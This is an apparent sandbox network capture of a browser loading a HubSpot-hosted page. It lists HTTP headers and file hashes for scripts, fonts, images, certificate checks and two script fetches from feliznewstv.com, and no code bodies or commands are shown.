x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare


--- Additional Info ---
Magic:  ASCII text, with very long lines (38627)
Size:   78600
Md5:    5256ccfbc2ab2efe1333e9307bc73e65
Sha1:   24f4e33e7aae36a340369b7142cfb52ae65b6d44
Sha256: d19cd994105a0d58d42125024879d444797c935ccdbc763957bc033ca6f5b555
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         172.65.208.22
HTTP/1.1 200 OK
Content-Type: application/javascript;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Content-Length: 603
Connection: keep-alive
X-Trace: 2B911C44FDC4D8DE4B89196FE47126FCE0FEEBF9F1000000000000000000
Cache-Control: public, max-age=30
Vary: Accept-Encoding
X-HubSpot-Correlation-Id: 560ea103-afee-4fea-8d8f-2e5ad1c2ba77
Content-Encoding: gzip
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 3600
Access-Control-Allow-Origin: http://appnewstv.hs-sites-eu1.com
Last-Modified: Wed, 14 Sep 2022 07:44:13 GMT
CF-Cache-Status: EXPIRED
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 74a86bf96f75b4f4-OSL


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   603
Md5:    52c4889fe72e3ec52d4cb3917b4ed58d
Sha1:   34ce208a60c6af7280c925df6ef34a91dfeca1e5
Sha256: ffcb11e1ebc9b4538cf20471d8add627bbbf754e2ee158f7b7c49ef3ad423f42
                                        
                                            GET /cms-free-branding-lib/static-1.111/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.6.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 10:25:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 12 Jul 2022 20:24:02 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: UeMu8WOMDUthADLLgqZZZU3H9mISgOsX
etag: W/"29a15a515ef5e383fba2c6d65b1de499"
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 60d22b5ab79521d827fcdd546c7710d4.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: -KuTJcFYSjo9F4GglqsT_-vXHaNSY_Z_DAQD2EJCoeEMmw1nPJ3ipg==
cf-cache-status: HIT
age: 1425801
expires: Thu, 14 Sep 2023 10:25:59 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ar6utrnujoinpFNKDpTPlEASaHHV6DBTgxVcxiucpuBu%2FQoC6bv%2B5GsjK5J5q4jpmVySQ0Y3YKCgHzv3RYAd%2Bd3tXhrjC1fKBkmhPgVdqe9FbVP%2Fi9TtrikzLpKeEjhtbL7poPp67P8%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74a86bf96c02b50c-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (64286), with no line terminators
Size:   49864
Md5:    ba991217faf06639f02d84fb9032747c
Sha1:   256fba261c1656ac538f0bf7c19c424a764311f1
Sha256: d014f303203a7d12d14f8115a376f10d4358476cb1d97b1a865f7208261c6153
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 6iXLLqp98SfLNgBmoHNGrw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         52.39.126.109
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: zJNqC5dCWpCEdGIvMcfOgMO1mjM=

                                        
                                            GET /hubfs/26246913/raw_assets/public/@marketplace/GiantFocal/Hatch_Landing/images/placeholder/image-02.jpg HTTP/1.1 
Host: 26246913.fs1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: image/jpeg
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Content-Length: 208912
Connection: keep-alive
CF-Ray: 74a86bfa9b9eb515-OSL
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
ETag: "576c8bc261d879e5c7095993fa055911"
Last-Modified: Tue, 13 Sep 2022 13:51:23 GMT
Vary: Accept-Encoding
Via: 1.1 0562d7d213bde9a129ec458c631f9cee.cloudfront.net (CloudFront)
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
Cf-Bgj: imgq:85,h2pri
Cf-Polished: origSize=208920, status=webp_bigger
Edge-Cache-Tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
X-Amz-Cf-Id: mDqyHtOHIzO_qgXXNEX-kYj5maCnodTPy9QRW6ADQTUyaGlKDTWddA==
X-Amz-Cf-Pop: CPH50-C1
x-amz-id-2: TMJLjSWFnpVNG6PErGDCY637rzVM01XSn7rIc6Xcw3emZCzjMmwjLLRpKyERLTnoGPJwt4jJQ7o=
x-amz-meta-cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
x-amz-meta-created-unix-time-millis: 1663077082549
x-amz-meta-index-tag: none
x-amz-replication-status: COMPLETED
x-amz-request-id: HW3RG1JQ5A158BX7
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: a0xWrfJ3xzhrq6qQxYKJrHAsTUBXaOuy
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
X-Robots-Tag: none
Server: cloudflare


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1441, components 3\012- data
Size:   208912
Md5:    bfdc57caf64cf284e867df913fe185da
Sha1:   f7dcd78a87b1e123f9a2f9f55ec1d589c872768b
Sha256: f5e6d7ccd952d26615cf449d6548878465e7297a09175a9054ce2f53ba7d20fc
                                        
                                            GET /hubfs/26246913/raw_assets/public/@marketplace/GiantFocal/Hatch_Landing/images/placeholder/hatch-landing.svg HTTP/1.1 
Host: 26246913.fs1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: image/svg+xml
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74a86bfa9b82b51b-OSL
Access-Control-Allow-Origin: *
Cache-Control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
ETag: W/"af286b492412cf0f1308aa1ee9407d83"
Last-Modified: Tue, 13 Sep 2022 13:51:23 GMT
Vary: Accept-Encoding
Via: 1.1 1624c79cd07e6098196697a6a7907e4a.cloudfront.net (CloudFront)
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
cache-tag: F-53071101646,FD-53071101644,P-26246913,FLS-ALL
Edge-Cache-Tag: F-53071101646,FD-53071101644,P-26246913,FLS-ALL
X-Amz-Cf-Id: SFfzADrJGoX-6VPMScrsvAJrkheJzEV5R5G4GBBMX14M51F-UpOwug==
X-Amz-Cf-Pop: CPH50-C1
x-amz-id-2: IAMS5JkvpWrEj/pdqkEOErIhzvmkI5EgCb5bSmdcIKbZ28jw0593LrIH9v7JNuZLbsEoOwZCpcM=
x-amz-meta-cache-tag: F-53071101646,FD-53071101644,P-26246913,FLS-ALL
x-amz-meta-created-unix-time-millis: 1663077082624
x-amz-meta-index-tag: none
x-amz-replication-status: COMPLETED
x-amz-request-id: HW3SFNJBC9K6YTBH
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: KID.skCzBK4TAd09TQ13YVDwgvEZqKoh
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
X-Robots-Tag: none
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (693)
Size:   1506
Md5:    b115ac3b89c0aee15fefc9d2a8175a2e
Sha1:   1593ab592da720765b4ca2f7a80ed2dd6fe80322
Sha256: 24af5a3bb49b0cecbd9f8fb1817f62c5bc9c7e326d9950fb0fe40b44cee51756
                                        
                                            GET /cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.17.6.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 11:25:59 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H%2BiaoGxsG7tYvNU%2FhOo7IlKXDJyYQTZWwEDr7ZCGwrToRsqGyvgzUzLIXCkc08mq5pInDHF5lovDDDiIdNSj4ppMcvWtSAMnYkVBjqhopYElNZ9ONepkc3hffZ2AkiEoY%2FsW0nmxefo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74a86bfadf541c0e-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            GET /cms-free-branding-lib/static-1.111/assets/sprocket_white.svg HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.17.6.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 11:25:59 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/assets/sprocket_white.svg
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Fd2U0qAqUZ4AEE%2FM4SC51FQiEHnQ0W8M2a5nZbvpFIUiNbTJVfXZ019yEcZ0L%2BvYX9VrVVEDLCp6X8jbRGb58EUMaRiSjoNtaOfPerdECeN4DFEvLr3Hqu8j1zf3wk3Elr972YDSwpw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74a86bfaeb10b50f-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15744
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:34:08 GMT
expires: Thu, 07 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 571911
last-modified: Wed, 11 May 2022 19:24:48 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615
                                        
                                            GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15860
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:34:08 GMT
expires: Thu, 07 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 571911
last-modified: Wed, 11 May 2022 19:24:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15860, version 1.0\012- data
Size:   15860
Md5:    e9f5aaf547f165386cd313b995dddd8e
Sha1:   acdef5603c2387b0e5bffd744b679a24a8bc1968
Sha256: f5aebdfea35d1e7656ef4acc5db1f243209755ae3300943ef8fc6280f363c860
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 10:25:59 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "09A40458A8D09F4A00A80574A0D404CB719DBC66709FDFF0E426035C6CEDC4F1"
Last-Modified: Wed, 14 Sep 2022 04:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21536
Expires: Wed, 14 Sep 2022 16:24:55 GMT
Date: Wed, 14 Sep 2022 10:25:59 GMT
Connection: keep-alive

                                        
                                            GET /?api=1&lan=twthk&ht=2&counter0=josvip222 HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 10:25:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7f3ik2irke4cqqn48tflqkb25u; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (63717), with CRLF line terminators
Size:   512224
Md5:    9bba01d1d9085b86dc859903c9996c66
Sha1:   5ee01822118fcbed4f406e2273b10d1d607046ef
Sha256: bac95180b9d023e31413d3c4fe1722de075dcbd9c063d2e9a6f35eadce592b06
                                        
                                            GET /location HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx
Date: Wed, 14 Sep 2022 10:26:00 GMT
Content-Length: 241
Connection: keep-alive
Location: https://feliznewstv.com/location/


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   241
Md5:    2d26acd39ecd1a69f0d4019746bac7da
Sha1:   5996b124ec05053dd8708e453f78a78f0256ffb6
Sha256: 08664eb7296f9bf300c88e3b1d63eb282481a8bd4e9105b4f6b7756be3316a20
                                        
                                            GET /location/ HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 10:26:00 GMT
Content-Length: 468
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   468
Md5:    6f1497d5364a6cfda0e81dd10d409ebf
Sha1:   4db66111b55d4b33203ba3a888e12ba6163cdfdf
Sha256: 3cf8f3dd6ae89d4970edad8007c999d712327c53c1da0998db6f32c7ad99c4e2
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            GET /collectedforms.js HTTP/1.1 
Host: js-eu1.hscollectedforms.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.192.122
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 10:26:00 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: W/"7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 507b5edb20d0e1a0b73c8687f53defa8.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: 4x15r2QQ2poDiSr4Je3RAtQzJ4Vy6FcuxkEt7Yfp8x95RIzj5HGquw==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74a506dec96b9930-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 35600
server: cloudflare
cf-ray: 74a86c016b1a991a-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
Size:   23141
Md5:    4546e06e9f5d50e4b68720b04beece10
Sha1:   e8c1b145bafd2a258b8a7fbc87c01daa2190dcdd
Sha256: 6ee778726169e6ff1a5f2d443db925c7bd862b41c97873569e05ce8eb2d14c78
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
